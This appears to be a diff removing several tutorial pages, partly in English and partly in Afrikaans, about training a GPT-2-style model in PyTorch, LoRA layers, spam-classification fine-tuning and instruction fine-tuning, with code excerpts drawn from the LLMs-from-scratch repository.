- The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jump over** the point where the loss function is minimized).
|
|
||||||
- **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature.
|
|
||||||
- Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization.
|
|
||||||
- The device to use for training
|
|
||||||
- The number of epochs: Number of times to go over the training data
|
|
||||||
- The evaluation frequency: The frequency to call `evaluate_model`
|
|
||||||
- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `generate_and_print_sample`
|
|
||||||
- The start context: Which the starting sentence to use when calling `generate_and_print_sample`
|
|
||||||
- The tokenizer
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Functions to train the data
|
|
||||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
|
|
||||||
eval_freq, eval_iter, start_context, tokenizer):
|
|
||||||
# Initialize lists to track losses and tokens seen
|
|
||||||
train_losses, val_losses, track_tokens_seen = [], [], []
|
|
||||||
tokens_seen, global_step = 0, -1
|
|
||||||
|
|
||||||
# Main training loop
|
|
||||||
for epoch in range(num_epochs):
|
|
||||||
model.train() # Set model to training mode
|
|
||||||
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
optimizer.zero_grad() # Reset loss gradients from previous batch iteration
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
loss.backward() # Calculate loss gradients
|
|
||||||
optimizer.step() # Update model weights using loss gradients
|
|
||||||
tokens_seen += input_batch.numel()
|
|
||||||
global_step += 1
|
|
||||||
|
|
||||||
# Optional evaluation step
|
|
||||||
if global_step % eval_freq == 0:
|
|
||||||
train_loss, val_loss = evaluate_model(
|
|
||||||
model, train_loader, val_loader, device, eval_iter)
|
|
||||||
train_losses.append(train_loss)
|
|
||||||
val_losses.append(val_loss)
|
|
||||||
track_tokens_seen.append(tokens_seen)
|
|
||||||
print(f"Ep {epoch+1} (Step {global_step:06d}): "
|
|
||||||
f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
|
|
||||||
|
|
||||||
# Print a sample text after each epoch
|
|
||||||
generate_and_print_sample(
|
|
||||||
model, tokenizer, device, start_context
|
|
||||||
)
|
|
||||||
|
|
||||||
return train_losses, val_losses, track_tokens_seen
|
|
||||||
|
|
||||||
|
|
||||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
|
|
||||||
model.eval() # Set in eval mode to avoid dropout
|
|
||||||
with torch.no_grad():
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
|
|
||||||
model.train() # Back to training model applying all the configurations
|
|
||||||
return train_loss, val_loss
|
|
||||||
|
|
||||||
|
|
||||||
def generate_and_print_sample(model, tokenizer, device, start_context):
|
|
||||||
model.eval() # Set in eval mode to avoid dropout
|
|
||||||
context_size = model.pos_emb.weight.shape[0]
|
|
||||||
encoded = text_to_token_ids(start_context, tokenizer).to(device)
|
|
||||||
with torch.no_grad():
|
|
||||||
token_ids = generate_text(
|
|
||||||
model=model, idx=encoded,
|
|
||||||
max_new_tokens=50, context_size=context_size
|
|
||||||
)
|
|
||||||
decoded_text = token_ids_to_text(token_ids, tokenizer)
|
|
||||||
print(decoded_text.replace("\n", " ")) # Compact print format
|
|
||||||
model.train() # Back to training model applying all the configurations
|
|
||||||
```
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> To improve the learning rate there are a couple relevant techniques called **linear warmup** and **cosine decay.**
|
|
||||||
>
|
|
||||||
> **Linear warmup** consist on define an initial learning rate and a maximum one and consistently update it after each epoch. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\
|
|
||||||
> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases.
|
|
||||||
>
|
|
||||||
> _Note that these improvements aren't included in the previous code._
|
|
||||||
|
|
||||||
### Start training
|
|
||||||
|
|
||||||
```python
|
|
||||||
import time
|
|
||||||
start_time = time.time()
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.to(device)
|
|
||||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
|
|
||||||
|
|
||||||
num_epochs = 10
|
|
||||||
train_losses, val_losses, tokens_seen = train_model_simple(
|
|
||||||
model, train_loader, val_loader, optimizer, device,
|
|
||||||
num_epochs=num_epochs, eval_freq=5, eval_iter=5,
|
|
||||||
start_context="Every effort moves you", tokenizer=tokenizer
|
|
||||||
)
|
|
||||||
|
|
||||||
end_time = time.time()
|
|
||||||
execution_time_minutes = (end_time - start_time) / 60
|
|
||||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
|
|
||||||
```
|
|
||||||
|
|
||||||
### Print training evolution
|
|
||||||
|
|
||||||
With the following function it's possible to print the evolution of the model while it was being trained.
|
|
||||||
|
|
||||||
```python
|
|
||||||
import matplotlib.pyplot as plt
|
|
||||||
from matplotlib.ticker import MaxNLocator
|
|
||||||
import math
|
|
||||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
|
|
||||||
fig, ax1 = plt.subplots(figsize=(5, 3))
|
|
||||||
ax1.plot(epochs_seen, train_losses, label="Training loss")
|
|
||||||
ax1.plot(
|
|
||||||
epochs_seen, val_losses, linestyle="-.", label="Validation loss"
|
|
||||||
)
|
|
||||||
ax1.set_xlabel("Epochs")
|
|
||||||
ax1.set_ylabel("Loss")
|
|
||||||
ax1.legend(loc="upper right")
|
|
||||||
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
|
|
||||||
ax2 = ax1.twiny()
|
|
||||||
ax2.plot(tokens_seen, train_losses, alpha=0)
|
|
||||||
ax2.set_xlabel("Tokens seen")
|
|
||||||
fig.tight_layout()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
# Compute perplexity from the loss values
|
|
||||||
train_ppls = [math.exp(loss) for loss in train_losses]
|
|
||||||
val_ppls = [math.exp(loss) for loss in val_losses]
|
|
||||||
# Plot perplexity over tokens seen
|
|
||||||
plt.figure()
|
|
||||||
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
|
|
||||||
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
|
|
||||||
plt.xlabel('Tokens Seen')
|
|
||||||
plt.ylabel('Perplexity')
|
|
||||||
plt.title('Perplexity over Training')
|
|
||||||
plt.legend()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
|
|
||||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Save the model
|
|
||||||
|
|
||||||
It's possible to save the model + optimizer if you want to continue training later:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Save the model and the optimizer for later training
|
|
||||||
torch.save({
|
|
||||||
"model_state_dict": model.state_dict(),
|
|
||||||
"optimizer_state_dict": optimizer.state_dict(),
|
|
||||||
},
|
|
||||||
"/tmp/model_and_optimizer.pth"
|
|
||||||
)
|
|
||||||
# Note that this model with the optimizer occupied close to 2GB
|
|
||||||
|
|
||||||
# Restore model and optimizer for training
|
|
||||||
checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device)
|
|
||||||
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.load_state_dict(checkpoint["model_state_dict"])
|
|
||||||
optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1)
|
|
||||||
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
|
|
||||||
model.train(); # Put in training mode
|
|
||||||
```
|
|
||||||
|
|
||||||
Or just the model if you are planing just on using it:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Save the model
|
|
||||||
torch.save(model.state_dict(), "model.pth")
|
|
||||||
|
|
||||||
# Load it
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
|
|
||||||
model.load_state_dict(torch.load("model.pth", map_location=device))
|
|
||||||
|
|
||||||
model.eval() # Put in eval mode
|
|
||||||
```
|
|
||||||
|
|
||||||
## Loading GPT2 weights
|
|
||||||
|
|
||||||
There 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then:
|
|
||||||
|
|
||||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you"
|
|
||||||
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts.
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
||||||
|
|
@ -1,61 +0,0 @@
|
|||||||
# 7.0. LoRA Verbeterings in fyn-afstemming
|
|
||||||
|
|
||||||
## LoRA Verbeterings
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die gebruik van **LoRA verminder baie die berekening** wat nodig is om **fyn af te stem** reeds getrainde modelle.
|
|
||||||
|
|
||||||
LoRA maak dit moontlik om **groot modelle** doeltreffend fyn af te stem deur slegs 'n **klein deel** van die model te verander. Dit verminder die aantal parameters wat jy moet oplei, wat **geheue** en **berekeningshulpbronne** bespaar. Dit is omdat:
|
|
||||||
|
|
||||||
1. **Verminder die Aantal Opleibare Parameters**: In plaas daarvan om die hele gewigsmatris in die model op te dateer, **verdeel** LoRA die gewigsmatris in twee kleiner matrise (genoem **A** en **B**). Dit maak opleiding **vinniger** en vereis **minder geheue** omdat minder parameters opgedateer moet word.
|
|
||||||
|
|
||||||
1. Dit is omdat dit in plaas daarvan om die volledige gewigsopdatering van 'n laag (matris) te bereken, dit benader na 'n produk van 2 kleiner matrise wat die opdatering verminder om te bereken:\
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
2. **Hou Oorspronklike Model Gewigte Onveranderd**: LoRA laat jou toe om die oorspronklike modelgewigte dieselfde te hou, en slegs die **nuwe klein matrise** (A en B) op te dateer. Dit is nuttig omdat dit beteken dat die model se oorspronklike kennis bewaar word, en jy net wat nodig is aanpas.
|
|
||||||
3. **Doeltreffende Taakspesifieke Fyn-afstemming**: Wanneer jy die model wil aanpas vir 'n **nuwe taak**, kan jy net die **klein LoRA matrise** (A en B) oplei terwyl jy die res van die model soos dit is laat. Dit is **baie doeltreffender** as om die hele model weer op te lei.
|
|
||||||
4. **Bergingseffektiwiteit**: Na fyn-afstemming, in plaas daarvan om 'n **heel nuwe model** vir elke taak te stoor, hoef jy slegs die **LoRA matrise** te stoor, wat baie klein is in vergelyking met die hele model. Dit maak dit makliker om die model aan te pas vir baie take sonder om te veel berging te gebruik.
|
|
||||||
|
|
||||||
Om LoraLayers in plaas van Linear eenhede tydens 'n fyn-afstemming te implementeer, word hierdie kode hier voorgestel [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
|
|
||||||
```python
|
|
||||||
import math
|
|
||||||
|
|
||||||
# Create the LoRA layer with the 2 matrices and the alpha
|
|
||||||
class LoRALayer(torch.nn.Module):
|
|
||||||
def __init__(self, in_dim, out_dim, rank, alpha):
|
|
||||||
super().__init__()
|
|
||||||
self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
|
|
||||||
torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5)) # similar to standard weight initialization
|
|
||||||
self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
|
|
||||||
self.alpha = alpha
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
x = self.alpha * (x @ self.A @ self.B)
|
|
||||||
return x
|
|
||||||
|
|
||||||
# Combine it with the linear layer
|
|
||||||
class LinearWithLoRA(torch.nn.Module):
|
|
||||||
def __init__(self, linear, rank, alpha):
|
|
||||||
super().__init__()
|
|
||||||
self.linear = linear
|
|
||||||
self.lora = LoRALayer(
|
|
||||||
linear.in_features, linear.out_features, rank, alpha
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return self.linear(x) + self.lora(x)
|
|
||||||
|
|
||||||
# Replace linear layers with LoRA ones
|
|
||||||
def replace_linear_with_lora(model, rank, alpha):
|
|
||||||
for name, module in model.named_children():
|
|
||||||
if isinstance(module, torch.nn.Linear):
|
|
||||||
# Replace the Linear layer with LinearWithLoRA
|
|
||||||
setattr(model, name, LinearWithLoRA(module, rank, alpha))
|
|
||||||
else:
|
|
||||||
# Recursively apply the same function to child modules
|
|
||||||
replace_linear_with_lora(module, rank, alpha)
|
|
||||||
```
|
|
||||||
## Verwysings
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,117 +0,0 @@
|
|||||||
# 7.1. Fine-Tuning for Classification
|
|
||||||
|
|
||||||
## What is
|
|
||||||
|
|
||||||
Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> As pre-training a LLM that "understands" the text is pretty expensive it's usually easier and cheaper to to fine-tune open source pre-trained models to perform a specific task we want it to perform.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).
|
|
||||||
|
|
||||||
## Preparing the data set
|
|
||||||
|
|
||||||
### Data set size
|
|
||||||
|
|
||||||
Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._
|
|
||||||
|
|
||||||
This data set contains much more examples of "not spam" that of "spam", therefore the book suggest to **only use as many examples of "not spam" as of "spam"** (therefore, removing from the training data all the extra examples). In this case, this was 747 examples of each.
|
|
||||||
|
|
||||||
Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.
|
|
||||||
|
|
||||||
- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
|
|
||||||
- This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
|
|
||||||
- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.
|
|
||||||
|
|
||||||
### Entries length
|
|
||||||
|
|
||||||
As the training example expects entries (emails text in this case) of the same length, it was decided to make every entry as large as the largest one by adding the ids of `<|endoftext|>` as padding.
|
|
||||||
|
|
||||||
### Initialize the model
|
|
||||||
|
|
||||||
Using the open-source pre-trained weights initialize the model to train. We have already done this before and follow the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.
|
|
||||||
|
|
||||||
## Classification head
|
|
||||||
|
|
||||||
In this specific example (predicting if a text is spam or not), we are not interested in fine tune according to the complete vocabulary of GPT2 but we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words).
|
|
||||||
|
|
||||||
```python
|
|
||||||
# This code modified the final layer with a Linear one with 2 outs
|
|
||||||
num_classes = 2
|
|
||||||
model.out_head = torch.nn.Linear(
|
|
||||||
|
|
||||||
in_features=BASE_CONFIG["emb_dim"],
|
|
||||||
|
|
||||||
out_features=num_classes
|
|
||||||
)
|
|
||||||
```
|
|
||||||
|
|
||||||
## Parameters to tune
|
|
||||||
|
|
||||||
In order to fine tune fast it's easier to not fine tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics applicable. So, just **fine tuning the last layers is usually enough and faster**.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# This code makes all the parameters of the model unrtainable
|
|
||||||
for param in model.parameters():
|
|
||||||
param.requires_grad = False
|
|
||||||
|
|
||||||
# Allow to fine tune the last layer in the transformer block
|
|
||||||
for param in model.trf_blocks[-1].parameters():
|
|
||||||
param.requires_grad = True
|
|
||||||
|
|
||||||
# Allow to fine tune the final layer norm
|
|
||||||
for param in model.final_norm.parameters():
|
|
||||||
|
|
||||||
param.requires_grad = True
|
|
||||||
```
|
|
||||||
|
|
||||||
## Entries to use for training
|
|
||||||
|
|
||||||
In previos sections the LLM was trained reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted) in order for the model to understand better the language.
|
|
||||||
|
|
||||||
In this case we only care on the model being able to predict if the model is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify out previous training loss functions to only take into account that token.
|
|
||||||
|
|
||||||
This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:
|
|
||||||
|
|
||||||
```python
|
|
||||||
def calc_accuracy_loader(data_loader, model, device, num_batches=None):
|
|
||||||
model.eval()
|
|
||||||
correct_predictions, num_examples = 0, 0
|
|
||||||
|
|
||||||
if num_batches is None:
|
|
||||||
num_batches = len(data_loader)
|
|
||||||
else:
|
|
||||||
num_batches = min(num_batches, len(data_loader))
|
|
||||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
|
||||||
if i < num_batches:
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
|
|
||||||
with torch.no_grad():
|
|
||||||
logits = model(input_batch)[:, -1, :] # Logits of last output token
|
|
||||||
predicted_labels = torch.argmax(logits, dim=-1)
|
|
||||||
|
|
||||||
num_examples += predicted_labels.shape[0]
|
|
||||||
correct_predictions += (predicted_labels == target_batch).sum().item()
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
return correct_predictions / num_examples
|
|
||||||
|
|
||||||
|
|
||||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
logits = model(input_batch)[:, -1, :] # Logits of last output token
|
|
||||||
loss = torch.nn.functional.cross_entropy(logits, target_batch)
|
|
||||||
return loss
|
|
||||||
```
|
|
||||||
|
|
||||||
Note how for each batch we are only interested in the **logits of the last token predicted**.
|
|
||||||
|
|
||||||
## Complete GPT2 fine-tune classification code
|
|
||||||
|
|
||||||
You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
||||||
|
|
@ -1,100 +0,0 @@
|
|||||||
# 7.2. Fyn-afstemming om instruksies te volg
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie afdeling is om te wys hoe om 'n **reeds vooropgeleide model fyn af te stem om instruksies te volg** eerder as net teks te genereer, byvoorbeeld, om op take te reageer as 'n chat bot.
|
|
||||||
|
|
||||||
## Dataset
|
|
||||||
|
|
||||||
Om 'n LLM fyn af te stem om instruksies te volg, is dit nodig om 'n dataset met instruksies en antwoorde te hê om die LLM fyn af te stem. Daar is verskillende formate om 'n LLM op te lei om instruksies te volg, byvoorbeeld:
|
|
||||||
|
|
||||||
- Die Apply Alpaca prompt styl voorbeeld:
|
|
||||||
```csharp
|
|
||||||
Below is an instruction that describes a task. Write a response that appropriately completes the request.
|
|
||||||
|
|
||||||
### Instruction:
|
|
||||||
Calculate the area of a circle with a radius of 5 units.
|
|
||||||
|
|
||||||
### Response:
|
|
||||||
The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:
|
|
||||||
|
|
||||||
\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
|
|
||||||
```
|
|
||||||
- Phi-3 Prompt Styl Voorbeeld:
|
|
||||||
```vbnet
|
|
||||||
<|User|>
|
|
||||||
Can you explain what gravity is in simple terms?
|
|
||||||
|
|
||||||
<|Assistant|>
|
|
||||||
Absolutely! Gravity is a force that pulls objects toward each other.
|
|
||||||
```
|
|
||||||
Om 'n LLM met hierdie tipe datastelle te train in plaas van net rou teks help die LLM om te verstaan dat hy spesifieke antwoorde op die vrae wat hy ontvang, moet gee.
|
|
||||||
|
|
||||||
Daarom is een van die eerste dinge om te doen met 'n dataset wat versoeke en antwoorde bevat, om daardie data in die gewenste promptformaat te modelleer, soos:
|
|
||||||
```python
|
|
||||||
# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
|
|
||||||
def format_input(entry):
|
|
||||||
instruction_text = (
|
|
||||||
f"Below is an instruction that describes a task. "
|
|
||||||
f"Write a response that appropriately completes the request."
|
|
||||||
f"\n\n### Instruction:\n{entry['instruction']}"
|
|
||||||
)
|
|
||||||
|
|
||||||
input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""
|
|
||||||
|
|
||||||
return instruction_text + input_text
|
|
||||||
|
|
||||||
model_input = format_input(data[50])
|
|
||||||
|
|
||||||
desired_response = f"\n\n### Response:\n{data[50]['output']}"
|
|
||||||
|
|
||||||
print(model_input + desired_response)
|
|
||||||
```
|
|
||||||
Dan, soos altyd, is dit nodig om die datastel in stelle vir opleiding, validasie en toetsing te skei.
|
|
||||||
|
|
||||||
## Batching & Data Loaders
|
|
||||||
|
|
||||||
Dan is dit nodig om al die insette en verwagte uitsette vir die opleiding te batch. Hiervoor is dit nodig om:
|
|
||||||
|
|
||||||
- Die teks te tokeniseer
|
|
||||||
- Al die monsters na dieselfde lengte te vul (gewoonlik sal die lengte so groot wees soos die kontekslengte wat gebruik is om die LLM voor te oefen)
|
|
||||||
- Die verwagte tokens te skep deur die inset met 1 in 'n pasgemaakte collate-funksie te skuif
|
|
||||||
- Sommige padding tokens met -100 te vervang om hulle van die opleidingsverlies uit te sluit: Na die eerste `endoftext` token, vervang al die ander `endoftext` tokens met -100 (want die gebruik van `cross_entropy(...,ignore_index=-100)` beteken dat dit teikens met -100 sal ignoreer)
|
|
||||||
- \[Opsioneel\] Masker met -100 ook al die tokens wat aan die vraag behoort sodat die LLM net leer hoe om die antwoord te genereer. In die Apply Alpaca styl sal dit beteken om alles te masker tot `### Response:`
|
|
||||||
|
|
||||||
Met dit geskep, is dit tyd om die data loaders vir elke datastel (opleiding, validasie en toets) te skep.
|
|
||||||
|
|
||||||
## Laai voor-opgeleide LLM & Fyn afstemming & Verlieskontrole
|
|
||||||
|
|
||||||
Dit is nodig om 'n voor-opgeleide LLM te laai om dit fyn af te stem. Dit is reeds op ander bladsye bespreek. Dan is dit moontlik om die voorheen gebruikte opleidingsfunksie te gebruik om die LLM fyn af te stem.
|
|
||||||
|
|
||||||
Tydens die opleiding is dit ook moontlik om te sien hoe die opleidingsverlies en validasieverlies gedurende die epoches varieer om te sien of die verlies verminder en of oorpassing plaasvind.\
|
|
||||||
Onthou dat oorpassing plaasvind wanneer die opleidingsverlies verminder, maar die validasieverlies nie verminder of selfs toeneem nie. Om dit te vermy, is die eenvoudigste ding om die opleiding te stop by die epoch waar hierdie gedrag begin.
|
|
||||||
|
|
||||||
## Antwoordkwaliteit
|
|
||||||
|
|
||||||
Aangesien dit nie 'n klassifikasie fyn-afstemming is waar dit moontlik is om meer op die verliesvariaties te vertrou nie, is dit ook belangrik om die kwaliteit van die antwoorde in die toetsdatastel te kontroleer. Daarom word dit aanbeveel om die gegenereerde antwoorde van al die toetsdatastelle te versamel en **hulle kwaliteit handmatig te kontroleer** om te sien of daar verkeerde antwoorde is (let daarop dat dit moontlik is vir die LLM om die formaat en sintaksis van die antwoordsin te korrek te skep, maar 'n heeltemal verkeerde antwoord te gee. Die verliesvariasie sal hierdie gedrag nie weerspieël nie).\
|
|
||||||
Let daarop dat dit ook moontlik is om hierdie hersiening uit te voer deur die gegenereerde antwoorde en die verwagte antwoorde aan **ander LLMs oor te dra en hulle te vra om die antwoorde te evalueer**.
|
|
||||||
|
|
||||||
Ander toetse om te loop om die kwaliteit van die antwoorde te verifieer:
|
|
||||||
|
|
||||||
1. **Meet Massiewe Multitask Taalbegrip (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU evalueer 'n model se kennis en probleemoplossingsvermoëns oor 57 vakke, insluitend menswetenskappe, wetenskappe, en meer. Dit gebruik meerkeuse vrae om begrip op verskillende moeilikheidsgraad te evalueer, van elementêr tot gevorderd professioneel.
|
|
||||||
2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): Hierdie platform laat gebruikers toe om antwoorde van verskillende chatbots langs mekaar te vergelyk. Gebruikers voer 'n prompt in, en verskeie chatbots genereer antwoorde wat direk vergelyk kan word.
|
|
||||||
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval is 'n geoutomatiseerde evaluasieraamwerk waar 'n gevorderde LLM soos GPT-4 die antwoorde van ander modelle op verskeie prompts evalueer.
|
|
||||||
4. **Algemene Taalbegrip Evaluasie (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE is 'n versameling van nege natuurlike taalbegrip take, insluitend sentimentanalise, teksimplikasie, en vraagbeantwoording.
|
|
||||||
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Gebaseer op GLUE, sluit SuperGLUE meer uitdagende take in wat ontwerp is om moeilik te wees vir huidige modelle.
|
|
||||||
6. **Buiten die Imitasie Speletjie Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench is 'n grootmaat benchmark met meer as 200 take wat 'n model se vermoëns in areas soos redeneer, vertaling, en vraagbeantwoording toets.
|
|
||||||
7. **Holistiese Evaluasie van Taalmodelle (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM bied 'n omvattende evaluasie oor verskeie metrieke soos akkuraatheid, robuustheid, en billikheid.
|
|
||||||
8. [**OpenAI Evals**](https://github.com/openai/evals)**:** 'n Oopbron evaluasieraamwerk deur OpenAI wat toelaat dat AI-modelle op pasgemaakte en gestandaardiseerde take getoets word.
|
|
||||||
9. [**HumanEval**](https://github.com/openai/human-eval)**:** 'n Versameling programmeringsprobleme wat gebruik word om die kodegenereringsvermoëns van taalmodelle te evalueer.
|
|
||||||
10. **Stanford Vraag Beantwoording Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD bestaan uit vrae oor Wikipedia-artikels, waar modelle die teks moet verstaan om akkuraat te antwoord.
|
|
||||||
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** 'n Grootmaat dataset van trivia vrae en antwoorde, saam met bewysdokumente.
|
|
||||||
|
|
||||||
en baie, baie meer
|
|
||||||
|
|
||||||
## Volg instruksies fyn-afstemming kode
|
|
||||||
|
|
||||||
Jy kan 'n voorbeeld van die kode om hierdie fyn afstemming uit te voer vind in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)
|
|
||||||
|
|
||||||
## Verwysings
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,98 +0,0 @@
|
|||||||
